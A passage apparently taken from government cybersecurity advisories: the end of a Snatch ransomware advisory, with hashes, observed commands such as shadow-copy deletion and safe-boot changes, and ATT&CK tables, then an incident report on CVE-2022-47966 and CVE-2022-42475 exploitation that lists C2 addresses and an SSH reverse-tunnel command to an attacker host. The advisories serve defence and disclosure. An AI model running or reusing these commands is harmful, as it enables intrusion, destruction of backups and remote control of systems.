28e82f28d0b9eb6a53d22983e21a9505ada925ebb61382fabebd76b8c4acff7c
safe.exe
fc31043b5f079ce88385883668eeebba76a62f77954a960fb03bf46f47dbb066
DefenderControl.exe
a201f7f81277e28c0bdd680427b979aee70e42e8a98c67f11e7c83d02f8fe7ae
PRETTYOCEANApplicationdrs.bi
6992aaad3c47b938309fc1e6f37179eb51f028536f8afc02e4986312e29220c0
Setup.exe
510e9fa38a08d446189c34fe6125295f410b36f00aceb65e7b4508e9d7c4e1d1
WRSA.exe
ed0fd61bf82660a69f5bfe0e66457cfe56d66dd2b310e9e97657c37779aef65d
ghnhfglwaplf.bat
2155a029a024a2ffa4eff9108ac15c7db527ca1c8f89ccfd94cc3a70b77cfc57
nllraq.bat
251427c578eaa814f07037fbe6e388b3bc86ed3800d7887c9d24e7b94176e30d
ygariiwfenmqteiwcr.bat
3295f5029f9c9549a584fa13bc6c25520b4ff9a4b2feb1d9e935cc9e4e0f0924
bsfyqgqeauegwyfvtp.bat
6c9d8c577dddf9cc480f330617e263a6ee4461651b4dec1f7215bda77df911e7
rgibdcghzwpk.bat
84e1476c6b21531de62bbac67e52ab2ac14aa7a30f504ecf33e6b62aa33d1fe5
pxyicmajjlqrtgcnhi.bat
a80c7fe1f88cf24ad4c55910a9f2189f1eedad25d7d0fd53dbfe6bdd68912a84
evhgpp.bat
b998a8c15cc19c8c31c89b30f692a40b14d7a6c09233eb976c07f19a84eccb40
eqbglqcngblqnl.bat
1fbdb97893d09d59575c3ef95df3c929fe6b6ddf1b273283e4efadf94cdc802d
qesbdksdvnotrjnexutx.bat
0965cb8ee38adedd9ba06bdad9220a35890c2df0e4c78d0559cd6da653bf740f
HOW TO RESTORE YOUR FILES.TXT
Filenames
SHA-1
safe.exe
c8a0060290715f266c89a21480fed08133ea2614
Commands
wmiadap.exe /F /T /R
%windir%System32svchost.eve –k WerSvcGroup
conhost.exe 0xFFFFFFFF -ForceV1
vssadmin delete shadows /all /quiet
bcdedit.exe /set {current} safeboot minimal
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\VSS /VE /T REG_SZ /F /D Service
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\mXoRpcSsx /VE /T REG_SZ /F /D Service
REG QUERY HKLM\SYSTEM\CurrentControlSet\Control /v SystemStartOptions
%CONHOST% “1088015358-1778111623-1306428145949291561678876491840500802412316031-33820320
“C:Program Files (x86)MicrosoftEdgeApplicationmsedge.exe” –flag-switches-begin –flag-switches-end –no-startup-window /prefetch:5
cmd /d /c cmd /d /c cmd /d /c start ” ” C:Usersgrade1AppDataLocalPRETTYOCEANluvApplicationPRETTYOCEANApplicationidf.bi.
Registry Keys
HKLM\SOFTWARE\Microsoft\Windows Media Player NSS\3.0\Servers\D8B548F0-E306-4B2B-BD82-25DAC3208786\FriendlyName
HKU\S-1-5-21-4270068108-2931534202-3907561125-1001\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{ED50FC29-B964-48A9-AFB3-15EBB9B97F36} {ADD8BA80-002B-11D0-8F0F-00C04FD7D062} 0xFFFF
Source
Message
TerminalServices-RemoteConnectionManager
Remote session from client name exceeded the maximum allowed failed logon attempts. The session was forcibly terminated.
Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall
A rule was added (Event 2004) or modified (Event 2005) in the Windows Defender Firewall exception list. All rules included action “Allow” and rule name included “File and Printer Sharing”
Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall
A Windows Defender Firewall setting was changed in private, public, and domain profile with type “Enable Windows Defender Firewall” and value of “no”.
Microsoft-Windows-TaskScheduler%4Operational
Instance of process C:\Windows\svchost.exe. (Incorrect file location; should be C:\Windows\System32\svchost.exe)
Mutexes Created
\Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-fc_key
\Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-sjlj_once
\Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-use_fc_key
gcc-shmem-tdm2-fc_key
gcc-hmem-tdm2-sjlj_once
gcc-shmem-tdm2-use_fc_key
MITRE ATT&CK TACTICS AND TECHNIQUES
See Tables 4-16 for all referenced threat actor tactics and techniques in this advisory.
Technique Title
ID
Use
Gather Victim Network Information
T1590
Snatch threat actors may gather information about the victim’s networks that can be used during targeting.
Technique Title
ID
Use
Acquire Infrastructure: Virtual Private Server
T1583.003
Snatch threat actors may rent Virtual Private Servers (VPSs) that can be used during targeting. Snatch threat actors acquire infrastructure from VPS service providers that are known for renting VPSs with minimal registration information, allowing for more anonymous acquisitions of infrastructure.
Technique Title
ID
Use
Valid Accounts
T1078
Snatch threat actors use compromised user credentials from criminal forums/marketplaces to gain access and maintain persistence on a victim’s network.
External Remote Services
T1133
Snatch threat actors exploit weaknesses in RDP to perform brute forcing and gain administrator credentials for a victim’s network.
Snatch threat actors use VPN services to connect to a victim’s network.
Technique Title
ID
Use
Command and Scripting Interpreter: Windows Command Shell
T1059.003
Snatch threat actors may use batch files (.bat) during ransomware execution and data discovery.
System Services: Service Execution
T1569.002
Snatch threat actors may leverage various Windows tools to enumerate systems on the victim’s network. Snatch ransomware used sc.exe.
Technique Title
ID
Use
Valid Accounts: Domain Accounts
T1078.002
Snatch threat actors compromise domain accounts to maintain persistence on a victim’s network.
Technique Title
ID
Use
Masquerading
T1036
Snatch threat actors have the ransomware executable match the SHA-256 hash of a legitimate file to avoid rule-based detection.
Indicator Removal: File Deletion
T1070.004
Snatch threat actors delete batch files from a victim’s filesystem once execution is complete.
Modify Registry
T1112
Snatch threat actors modify Windows Registry keys to aid in persistence and execution.
Impair Defenses: Disable or Modify Tools
T1562.001
Snatch threat actors have attempted to disable a system’s antivirus program to enable persistence and ransomware execution.
Impair Defenses: Safe Mode Boot
T1562.009
Snatch threat actors abuse Windows Safe Mode to circumvent detection by antivirus or endpoint protection and encrypt files when few services are running.
Technique Title
ID
Use
Brute Force: Password Guessing
T1110.001
Snatch threat actors use brute force to obtain administrator credentials for a victim’s network.
Technique Title
ID
Use
Query Registry
T1012
Snatch threat actors may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Process Discovery
T1057
Snatch threat actors search for information about running processes on a system.
Technique Title
ID
Use
Remote Services: Remote Desktop Protocol
T1021.001
Snatch threat actors may use Valid Accounts to log into a computer using the Remote Desktop Protocol.
Technique Title
ID
Use
Data from Local System
T1005
Snatch threat actors search systems to find files and folders of interest prior to exfiltration.
Technique Title
ID
Use
Application Layer Protocols: Web Protocols
T1071.001
Snatch threat actors establish connections over port 443 to blend C2 traffic in with other web traffic.
Technique Title
ID
Use
Exfiltration
TA0010
Snatch threat actors use exfiltration techniques to steal data from a victim’s network.
Technique Title
ID
Use
Data Encrypted for Impact
T1486
Snatch threat actors encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources.
Inhibit System Recovery
T1490
Snatch threat actors delete all volume shadow copies from a victim’s filesystem to inhibit system recovery.
MITIGATIONS
These mitigations apply to all stakeholders. The authoring agencies recommend that software manufacturers incorporate secure-by-design and -default principles and tactics into their software development practices for hardening software against ransomware attacks (e.g., to prevent threat actors from using Safe Mode to evade detection and file encryption), thus strengthening the security posture of their customers.
For more information on secure by design, see CISA’s Secure by Design and Default webpage and joint guide.
The FBI and CISA recommend organizations implement the mitigations below to improve your organization’s cybersecurity posture on the basis of the Snatch threat actor’s activity. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.
In addition, the authoring authorities of this CSA recommend network defenders apply the following mitigations to limit potential adversarial use of common system and network discovery techniques, and to reduce the impact and risk of compromise by ransomware or data extortion actors:
Note: NIST guidance suggests favoring longer passwords instead of requiring regular and frequent password resets. Frequent password resets are more likely to result in users developing password “patterns” cyber criminals can easily decipher.
VALIDATE SECURITY CONTROLS
In addition to applying mitigations, FBI and CISA recommend exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. FBI and CISA recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.
To get started:
FBI and CISA recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.
RESOURCES
REPORTING
The FBI is seeking any information that can be shared, to include boundary logs showing communication to and from IP addresses, a sample ransom note, communications with Snatch threat actors, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file. The FBI and CISA strongly discourage paying ransom as payment does not guarantee victim files will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Regardless of whether you or your organization have decided to pay the ransom, the FBI and CISA urge you to promptly report ransomware incidents to the FBI Internet Crime Complaint Center (IC3) at ic3.gov, a local FBI Field Office, or to CISA at report@cisa.gov or (888) 282-0870.
REFERENCES
[1] DataBreaches.net
DISCLAIMER
The information in this report is being provided “as is” for informational purposes only. FBI and CISA do not endorse any commercial entity, product, or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by FBI or CISA.
VERSION HISTORY
September 20, 2023: Initial version.
Multiple Nation-State Threat Actors Exploit CVE-2022-47966 and CVE-2022-42475
SUMMARY
The Cybersecurity and Infrastructure Security Agency (CISA), Federal Bureau of Investigation (FBI), and Cyber National Mission Force (CNMF) identified the presence of indicators of compromise (IOCs) at an Aeronautical Sector organization as early as January 2023. Analysts confirmed that nation-state advanced persistent threat (APT) actors exploited CVE-2022-47966 to gain unauthorized access to a public-facing application (Zoho ManageEngine ServiceDesk Plus), establish persistence, and move laterally through the network. This vulnerability allows for remote code execution on the ManageEngine application. Additional APT actors were also observed exploiting CVE-2022-42475 to establish presence on the organization’s firewall device.
CISA and co-sealers are releasing this joint Cybersecurity Advisory (CSA) to provide network defenders with tactics, techniques, and procedures (TTPs), IOCs, and methods to detect and protect against similar exploitation.
Download the PDF version of this report:
For a downloadable copy of IOCs, see:
For a downloadable copy of the Malware Analysis Report (MAR) accompanying this CSA, see:
Note: This advisory uses the MITRE ATT&CK® for Enterprise framework, version 13. See Tables 3-13 for the APT actors’ activity mapped to MITRE ATT&CK tactics and techniques with corresponding mitigation and/or detection recommendations.
Overview
By request of the impacted organization, CISA conducted an incident response engagement from February to April 2023. CISA and co-sealers assess that beginning as early as January 2023, multiple nation-state APT actors were present on the organization’s network via at least two initial access vectors:
CISA and co-sealers identified an array of threat actor activity, including overlapping TTPs across multiple APT actors. Per the activity conducted, APT actors often scan internet-facing devices for vulnerabilities that can be easily exploited. Firewalls, virtual private networks (VPNs), and other edge network infrastructure continue to be of interest to malicious cyber actors. When targeted, they can be leveraged to expand access into the targeted network, serve as malicious infrastructure, or both.
APT Actor Activity
Initial Access Vector 1
As early as January 2023, APT actors exploited CVE-2022-47966 [T1190] for initial access to the organization’s web server hosting the public-facing application, Zoho ManageEngine ServiceDesk Plus. CISA observed indications in log files that a connection to the known malicious IP address 192.142.226[.]153 was made as part of initial exploitation.
Through exploitation of CVE-2022-47966, APT actors achieved root level access on the web server and created a local user account [T1136.001] named Azure with administrative privileges [T1068]. Actors were further able to download malware, enumerate the network, collect administrative user credentials, and move laterally through the organization’s network. CISA and co-sealers were unable to determine if proprietary information was accessed, altered, or exfiltrated. This was due to the organization not clearly defining where their data was centrally located and CISA having limited network sensor coverage.
Initial Access Vector 2
Additional APT actors exploited CVE-2022-42475 on the organization’s firewall device, which was indicated by multiple successful VPN connections from known-malicious IPs between February 1-16, 2023. It was identified that APT actors compromised and used disabled, legitimate administrative account credentials [T1078.003] from a previously hired contractor—of which the organization confirmed the user had been disabled prior to the observed activity.
Analysis identified that a common behavior for these threat actors was to use disabled administrative account credentials and delete logs from several critical servers in the environment [T1070.001]. This prevented the ability to detect follow-on exploitation or data exfiltration. CISA and co-sealers were also unable to further track the activity due to the organization not having Network Address Translation (NAT) IP logging enabled.
APT actors initiated multiple Transport Layer Security (TLS)-encrypted sessions [T1573.002] on Transmission Control Protocol (TCP) port 10443 [T1571], indicating successful exchanges of data transfer from the firewall device. APT actors were observed connecting to the device from the following actor-controlled C2 IP addresses:
144.202.2[.]71
207.246.105[.]240
45.77.121[.]232
47.90.240[.]218
APT actors further leveraged legitimate credentials to move from the firewall to a web server, where multiple web shells were loaded—among other locations, such as the OWA server—into the following directories. Note: The following file paths to these web shells were received in coordination with a trusted third-party; however, the artifacts were not received for analysis.
c:Program FilesMicrosoft Office Web AppsRootWebsiteen-usresource.aspx
c:inetpubwwwrootuninetcssfont-awesomecssdiscover.ashx
c:inetpubwwwrootuninetcssfont-awesomecssconfiglogin.ashx
c:Program FilesCommon FilesMicrosoft SharedWeb Server Extensions15templatelayoutsapproveinfo.aspx
c:Program FilesMicrosoft Office Web AppsRootWebsiteinfos.aspx
c:Program FilesMicrosoft Office Web AppsRootWebsiteerrorinfo.aspx
c:Program FilesMicrosoft Office Web AppsRootWebsiteinfos.ashx
c:Program FilesMicrosoft Office Web AppsRootWebsiteen-userror.aspx
c:Program FilesMicrosoft Office Web AppsRootWebsiteen-usinfos.aspx
c:Program FilesMicrosoft Office Web AppsRootWebsiteen-usinfo.aspx
c:Program FilesMicrosoft Office Web AppsRootWebsiteen-usinfo-1.aspx
c:Program FilesMicrosoft Office Web AppsRootWebsiteen-usnew_list.aspx
c:Program FilesMicrosoft Office Web AppsRootWebsiteen-userrorinfo.aspx
c:Program FilesMicrosoft Office Web AppsRootWebsiteen-uslgnbotr.ashx
c:inetpubpasswordchange LECPNJYRH.aspx
c:inetpubpasswordchange9ehj.aspx
c:inetpubwwwrootwssVirtualDirectoriesPortal80_vti_pvtservicesinfo.ashx
c:inetpubwwwrootwssVirtualDirectoriesPortal80_vti_pvtservices.aspx
c:inetpubredirectedSites[REDACTED]productsuns1fw.aspx
c:inetpubredirectedSites[REDACTED]productsuns1ew.aspx
The following IP addresses were identified as associated with the loaded web shells:
45.90.123[.]194
154.6.91[.]26
154.6.93[.]22
154.6.93[.]5
154.6.93[.]12
154.6.93[.]32
154.6.93[.]24
184.170.241[.]27
191.96.106[.]40
102.129.145[.]232
Forensic Timeline of APT Actor Activity
Tables 1 and 2 list the timeline of events discovered during the incident response, as well as tools used by the APT actors to conduct their operations, respectively. All timestamps are presented in Coordinated Universal Time (UTC).
Timestamp (UTC)
Event
Description
2023-01-18
11:57:02
Hello World User-Agent string observed in 44 total events.
Uniform Resource Identifier (URI): /cgi-bin/downloadFlile[.]cgi
Hello World, the User-Agent string inside of the initiated HTTP request, was observed during communication between the organization’s web server and malicious command and control (C2) server IP 92.118.39[.]82 [T1071.001]. This string has been observed in open source as an initial step of the Mirai botnet to download malicious artifacts [T1583.005].[1]
2023-01-20
Attempts made to export three files; associated with malicious IP 192.142.226[.]153.
APT actors attempted to export [TA0009], [TA0010] three files, which were analyzed and identified as Local Security Authority Subsystem Service (LSASS) dump files. These files were renamed with .zip and .gif extensions to evade detection [T1036.008]. Analysis confirmed the APT actors were unsuccessful at exfiltrating these files:
wo_view_bg.zip (09:06:37 UTC)
wo_view_bg1.gif (09:08:11 UTC)
wo_view_bg2.gif (09:19:43 UTC)
Note: If local administrative access is achieved on a victim host, dumping LSASS credentials may allow for lateral movement across the environment. This behavior was identified during the engagement and is detailed throughout Table 1.
2023-01-20
16:51:05
Successful web server exploitation via CVE-2022-47966.
Successful web server (Zoho ManageEngine ServiceDesk Plus) exploitation via CVE-2022-47966.
2023-01-21
06:46:42
Azure local user account with administrative permissions created.
A local user account with administrative permissions, named Azure, was created on the server hosting ServiceDesk Plus.
2023-01-21
06:49:40
LSASS dumped by Azure user.
The Azure user successfully accessed and dumped credentials stored in the process memory of LSASS for the Active Directory (AD) domain [T1003.001].
Note: Adversaries may create a local account to maintain access to victim systems. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service. Such accounts may be used to establish secondary credentialed access that does not require persistent remote access tools to be deployed on the system.
2023-01-21
06:50:59
Mimikatz.exe downloaded via ConnectWise ScreenConnect.
The legitimate ConnectWise ScreenConnect client was utilized to connect to the ServiceDesk system, download mimikatz.exe, and execute malicious payloads to steal credentials [T1219], [T1588.002].
Note: ConnectWise ScreenConnect was observed in multiple locations within the organization’s environment, but the organization confirmed that it was not authorized software. Analysis assessed APT actors downloaded the legitimate software for malicious, illegitimate use prior to the download of mimikatz.exe.
2023-01-21
07:34:32
Bitmap.exe malware downloaded and designated to connect to C2 IP 179.60.147[.]4.
Azure user account downloaded bitmap.exe to the ServiceDesk system to execute an obfuscated, embedded malicious payload from its C2 server [T1027.009]. This malware is identified as a variant of Metasploit (Meterpreter). See MAR-10430311-1.v1 for additional details.
2023-01-21
08:46:23
Mimikatz credential dump files created.
Two files (c:\windows\system32\fuu.txt, c:\windows\system32\jojo.txt) were created as a means for Mimikatz to dump/write credentials to disk on the ServiceDesk system [T1003].
2023-01-21
09:25:58
Legitimate files/applications nmap.exe and npcap.exe downloaded.
Azure user account downloaded nmap.exe [T1018] and npcap.exe [T1040] to continue network and credential information gathering efforts. Though legitimate applications, APT actors used these files for illegitimate, malicious purposes.
Note: Adversaries may gather information about the victim’s network topology that can be used during targeting. Information about network topologies may include a variety of details, including the physical and/or logical arrangement of both external-facing and internal network environments. This information may also include specifics regarding network devices (gateways, routers, etc.) and other infrastructure.
2023-01-21
13:56:14
ssh2.zip downloaded by the Azure user account.
APT actors downloaded the file ssh2.zip via the Azure user account, which contained legitimate files that could have been leveraged for malicious purposes. When unzipped, the following files were extracted:
install-sshd.ps1 (script)
psexec.exe
sshd.exe
ssh.exe
ssh-sk-helper.exe
libcrypto.dll
Note: CISA analyzed these files and did not identify the files as malicious. However,
ssh.exe
was downloaded to establish persistence on the ServiceDesk system via SSH [T1133] and is detailed in the scheduled task below.
2023-01-21
14:02:45
ngrok.yml
config file, and Remote Desktop Protocol (RDP) connection established.Ngrok was used to establish an RDP connection [T1021.001]—another method of maintaining persistence on the ServiceDesk system. In this instance, Ngrok was used to establish a reverse proxy connection to the ServiceDesk system.
At the time of analysis, the firewall access control lists (ACLs) allowed all outbound connections. Because the APT actors used an outbound reverse proxy, the connection was initiated from the ServiceDesk system, and the permissive outbound ACLs allowed the RDP session to be established.
Note: RDP is a common feature in operating systems, which allows a user to log into an interactive session with a system desktop graphical user interface on a remote system.
2023-01-21
14:31:01
SSH tools downloaded to establish reverse (remote) communication.
Three identified executables, which provide a command line interface with the compromised system, were observed in the following file system locations:
c:windowssystem32ssh-shellhost.exe
c:windowssystem32ssh-agent.exe
c:windowssystem32ssh-add.exe
While the files were not identified as malicious, they were loaded for malicious purposes.
2023-01-21
14:33:11
license validf
scheduled task created to communicate with malicious IP 104.238.234[.]145.
license validf
scheduled task [T1036.004] was created to execute ssh.exe
on a recurring basis on the ServiceDesk system [T1053.005]: c:\Windows\System32\ssh.exe -N -f -R 12100 sst@104.238.234.145 -p 443 -o StrictHostKeyChecking=no
Analysis identified
ssh.exe
was used to establish an SSH reverse tunnel to the APT actors’ C2 with dynamic port forwarding [T1572]. This allowed the actors to send traffic from their C2 server into the environment and connect directly to other systems and resources.
2023-01-21
14:51:49
PsExec executed on the ServiceDesk system.
Analysis identified evidence and execution of two files (
PsExec.exe
andpsexec.exe
) on the ServiceDesk system. These files were determined to be benign.APT actors utilized PsExec to create a scheduled task and force-store administrative credentials to the local machine.
psexec.exe -i -s C:\Windows\System32\mmc.exe /s C:\Windows\System32\taskschd.msc
powershell New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name "DisableRestrictedAdmin" -Value "0" -PropertyType DWORD -Force
Note: PsExec, a command line utility from Microsoft’s Sysinternals Suite, is known to be used for lateral movement; evidence of lateral movement via PsExec has not been confirmed.
2023-01-21
14:55:02
ProcDump created on the ServiceDesk system.
ProcDump was created at the following file system location:
c:\windows\system32\prc64.exe
This was later identified as a method for enumerating running processes/applications [T1057] and dumping LSASS credentials.
2023-01-24
15:07:18
Apache Log4j exploit attempted against the ServiceDesk system.
APT actors attempted to exploit a known Apache Log4j vulnerability (CVE-2021-44228) in the ServiceDesk system but were unsuccessful. The two IPs and one domain associated with this exploitation attempt are:
80.85.241[.]15
68.177.56[.]38
main.cloudfronts[.]net
2023-01-25
00:17:33
Mimikatz credential dump files created.
One file (
c:ManageEngineServiceDeskbin1.txt
) was created as a method for Mimikatz to dump/write credentials to disk on the ServiceDesk system.Note: This is a different path and time associated with Mimikatz than listed above.
2023-01-29
HTTP-GET requests sent to C2 IP
92.118.39[.]82
.The server hosting ServiceDesk was observed beaconing/sending HTTP-GET requests to a suspected APT-controlled C2 server, indicating malware was successfully implanted.
2023-02-02
05:51:08
Resource.aspx
web shell detected.Using additionally compromised, legitimate administrative credentials, APT actors logged into the Outlook Web Application (OWA) server from the ServiceDesk system. The actors dropped an Active Server Pages Extended (ASPX) web shell in the following file system location, which was designed to execute remote JavaScript code [T1059.007] on the OWA server [T1505.003]:
c:\Program Files\Microsoft Office Web Apps\RootWebSite\en-us\resource.aspx
Note: The administrative user’s credentials were obtained from the APT actors’ collection (LSASS dump) of credentials from the entire AD domain. This user is separate from the actor-created
Azure
user account.See MAR-10430311-1.v1 for additional details.
2023-02-02
18:45:58
Metasploit service installed.
APT actors installed Metasploit with the following attributes on the organization’s domain controller [T1059.001]:
QrrCvbrvnxasKTSb
[T1543.003]%COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4)
[T1564.003]Note: Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. Adversaries can use PowerShell to perform several actions, including discovery of information and execution of code.
2023-02-03
03:27:59
ConfigLogin.aspx
web shell detected.APT actors dropped an additional ASPX web shell on a web server in the following file system location:
c:inetpubwwwrotuninetcssfont-awesomecssConfigLogin.aspx
See MAR-10430311-1.v1 for additional details.
2023-02-03
15:12:23
wkHPd.exe
created to communicate with malicious IP 108.62.118[.]160.
APT actors created and used a variant of Metasploit (Meterpreter) on the ServiceDesk system, listed as
wkHPd.exe
[T1587.001]. This variant serves as an attack payload that runs an interactive shell and allows a malicious actor to control and execute code on a system.See MAR-10430311-1.v1 for additional details.
2023-02-08
08:56:35,
2023-02-09
20:19:59,
2023-03-04,
2023-03-18
Hypertext Preprocessor (PHP) files uploaded via HTTP-POST request from malicious IP
193.142.146[.]226
.PHP files were uploaded to the ServiceDesk system via HTTP-POST request. APT actors were observed writing 16 instances of the following files to disk:
[REDACTED]/wp-content/themes/seotheme/db.php
(12 instances) [REDACTED]/wp-content/plugins/ioptimization/IOptimize.php
(4 instances)
2023-03-06
06:49:40
Interact.sh
APT actors executed Domain Name System (DNS) scanning at an additional server (not the ServiceDesk system) and directed callback to the
Interact.sh
domain, which indicated the server was susceptible to a DNS-style attack [T1046]. Destination IP:
103.105.49[.]108
Post-engagement analysis was extended but analysts were unable to determine additional actions taken by the APT actors, likely due to a lack of sensor coverage and data unavailability. With the data available, it was determined APT actors used the tools listed in Table 2 during their operations.
Tool
Description
Observation
Mimikatz [2]
A credential dumping tool capable of obtaining plaintext Windows account logins and passwords, along with many other features that make it useful for testing the security of networks.
In addition to using Mimikatz for credential dumping, APT actors dumped the following Windows Registry Hive files:
sam.hiv
[T1003.002] system.hiv
security.hiv
These files were dumped to obtain registry information such as users on the system, data used by the operating system [T1012], and installed programs.
Ngrok [3]
Ngrok software operates by running a client process on the machine and creating a private connection tunnel to a designated open port. Ngrok delivers instant ingress to applications in any cloud, private network, or devices with authentication, load balancing, and other critical controls.
In recent years, Ngrok has been leveraged maliciously by a variety of threat actors, including use for persistence, lateral movement, and data exfiltration.[4],[5],[6]
Using Ngrok as an external service, APT actors were able to gain access to and utilize the command line on victim systems.
Note: CISA and co-sealers have observed this commonly used commercial platform being abused by malicious actors to bypass typical firewall controls. Ngrok’s ability to tunnel RDP and other services securely over internet connections makes it a target for abuse by malicious actors.
ProcDump
A command-line application used to monitor processes and create crash dump files. A crash dump file contains the data loaded in memory at the time the dump was triggered. It is typically used for troubleshooting errors with an application or operating system.
APT actors used ProcDump to conduct reconnaissance and examine spawned processes (applications in use). This tool was also utilized as a utility for dumping credentials from the server hosting ServiceDesk Plus.
Metasploit
Metasploit is an open-source penetration testing software.
APT actors’ specific use of Meterpreter—an attack payload of Metasploit—serves as an interactive shell and allows threat actors to control and execute code on a system.
Interact.sh
An open-source tool for detecting external interactions (communication).[7] This tool is used to detect callbacks from target systems for specified vulnerabilities and commonly used during the reconnaissance stages of adversary activity.
APT actors likely used
Interact.sh
to refrain from using and disclosing their own C2 infrastructure.
anydesk.exe
A remote desktop application that provides platform-independent remote access to personal computers and other devices running the host application. It offers remote control, file transfer, and VPN functionality.
Between early-February and mid-March 2023,
anydesk.exe
was observed on three hosts with different certificate issuers and hashes—none of which were the certified issuer [T1553.002]. APT actors compromised one host and moved laterally to install the executable on the remaining two [T1570]—listed in order of time, as follows:
c:\programdata\anydesk.exe
c:\Users\[REDACTED]\Downloads\AnyDesk.exe
c:Users[REDACTED]DocumentspersonalprogramAnyDesk.exe
Note: Analysts confirmed APT actors’ weaponized use of
anydesk.exe
but were unable to confirm how the software was installed on each host.
quser.exe
A valid program on Windows machines that displays information about user sessions on a Remote Desktop Session Host server [T1049], including the name of the user, name of the session on the remote desktop session host server, session ID, state of the session (active or disconnected), idle time (number of minutes since last keystroke or mouse movement), and date/time the user logged on.[8]
APT actors were observed using this tool as early as March 2023 across four locations with the same name but different hashes (one of which is associated with the Portuguese [Brazil] language pack):
c:\ProgramFiles\WindowsApps\Microsoft.LanguageExperiencePackpt-BR_19041.56.186.0_neutral__8wekyb3d8bbwe\Windows\System32\pt-BR
xpack.exe
A custom
.NET
loader that decrypts (AES), loads, and executes accompanying files. Xpack.exe
indicators were present on multiple organization hosts, with an unverified user account observed navigating to the sites: xpack.github[.]io
and xpack.disqus[.]com
. Additionally, one administrator account and multiple user accounts were observed executing the xpack.exe file from a hidden directory [T1564.001]: c:\USERS\[REDACTED]\.P2\POOL\PLUGINS\ORG.ECLIPSE.EMBEDCDT.TEMPLATES.XPACK_6.3.1.202210101738
This malware was predominantly used to execute system commands, drop additional malware and tools, and stage data for exfiltration [T1074]. Note: The data exfiltrated is unknown.
MITRE ATT&CK TACTICS AND TECHNIQUES
See Tables 3-13 for all referenced APT actors’ tactics and techniques for enterprise environments in this advisory. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool.
Technique Title
ID
Use
Acquire Infrastructure: Botnet
T1583.005
Actors used User-Agent string
Hello World
as an initial step of the Mirai botnet to later download malicious artifacts.
Develop Capabilities: Malware
T1587.001
Actors created and used a variant of Metasploit (Meterpreter) on the ServiceDesk system, listed as
wkHPd.exe
. This malware serves as an attack payload that runs an interactive shell; it allows for control and code execution on a system.
Obtain Capabilities: Exploits
T1588.002
Actors leveraged the legitimate ConnectWise ScreenConnect client to download and utilize the credential dumping tool,
mimikatz.exe
.
Technique Title
ID
Use
Exploit Public-Facing Application
T1190
Actors exploited a known vulnerability (CVE-2022-47966) in the organization’s web server hosting Zoho ManageEngine ServiceDesk Plus.
Actors also attempted to exploit a known Apache Log4j vulnerability (CVE-2021-44228) in the ServiceDesk system but were unsuccessful.
Technique Title
ID
Use
Command and Scripting Interpreter: PowerShell
T1059.001
Actors installed and used Metasploit via PowerShell on the organization’s domain controller.
Command and Scripting Interpreter: JavaScript
T1059.007
Actors dropped an ASPX web shell on the OWA server, which was designed to execute remote JavaScript code.
Technique Title
ID
Use
Scheduled Task/Job: Scheduled Task
T1053.005
Actors created the scheduled task
license validf
to execute ssh.exe
on a recurring basis. This executable was observed as means of establishing persistence on the ServiceDesk system.
Valid Accounts: Local Accounts
T1078.003
Actors compromised and utilized account credentials from a previously hired contractor, of which the contract ended prior to the timeframe of observed activity.
External Remote Services
T1133
ssh.exe
executes on a recurring basis via a scheduled task on the ServiceDesk system as a method for access via SSH.
Create Account: Local Account
T1136.001
Actors created a local account with administrative permissions on the server hosting ServiceDesk Plus.
Server Software Component: Web Shell
T1505.003
Actors logged into the OWA server from the ServiceDesk system and dropped an ASPX web shell to establish persistent access and execute remote code.
Create or Modify System Process: Windows Service
T1543.003
Actors created a Windows Service via Metasploit.
Technique Title
ID
Use
Exploitation for Privilege Escalation
T1068
Through exploitation of CVE-2022-47966, actors were given root level access on the web server and created a local user account named
Azure
with administrative privileges.
Technique Title
ID
Use
Indicator Removal: Clear Windows Event Logs
T1070.001
Actors compromised and used disabled, legitimate administrative account credentials to delete logs from several critical servers in the environment.
Masquerading: Masquerade Task or Service
T1036.004
Actors created a scheduled task
license validf
, which appears as legitimate/benign and executes ssh.exe
on a recurring basis on the ServiceDesk system.
Masquerading: Masquerade File Type
T1036.008
Actors attempted to export three files, which were analyzed and identified as LSASS dump files. These files were renamed with
.zip
and.gif
extensions to evade detection.
Obfuscated Files or Information: Embedded Payloads
T1027.009
Actors downloaded the malware
bitmap.exe
on the ServiceDesk system to execute an obfuscated, embedded malicious payload from its C2 server.
Subvert Trust Controls: Code Signing
T1553.002
Anydesk.exe
was observed on three hosts with different certificate issuers and hashes—none of which were the certified issuer.
Hide Artifacts: Hidden Files and Directories
T1564.001
Actors used
xpack.exe
as a method for decrypting, loading, and executing accompanying files from a hidden directory.
Hide Artifacts: Hidden Window
T1564.003
Actors used
-w hidden
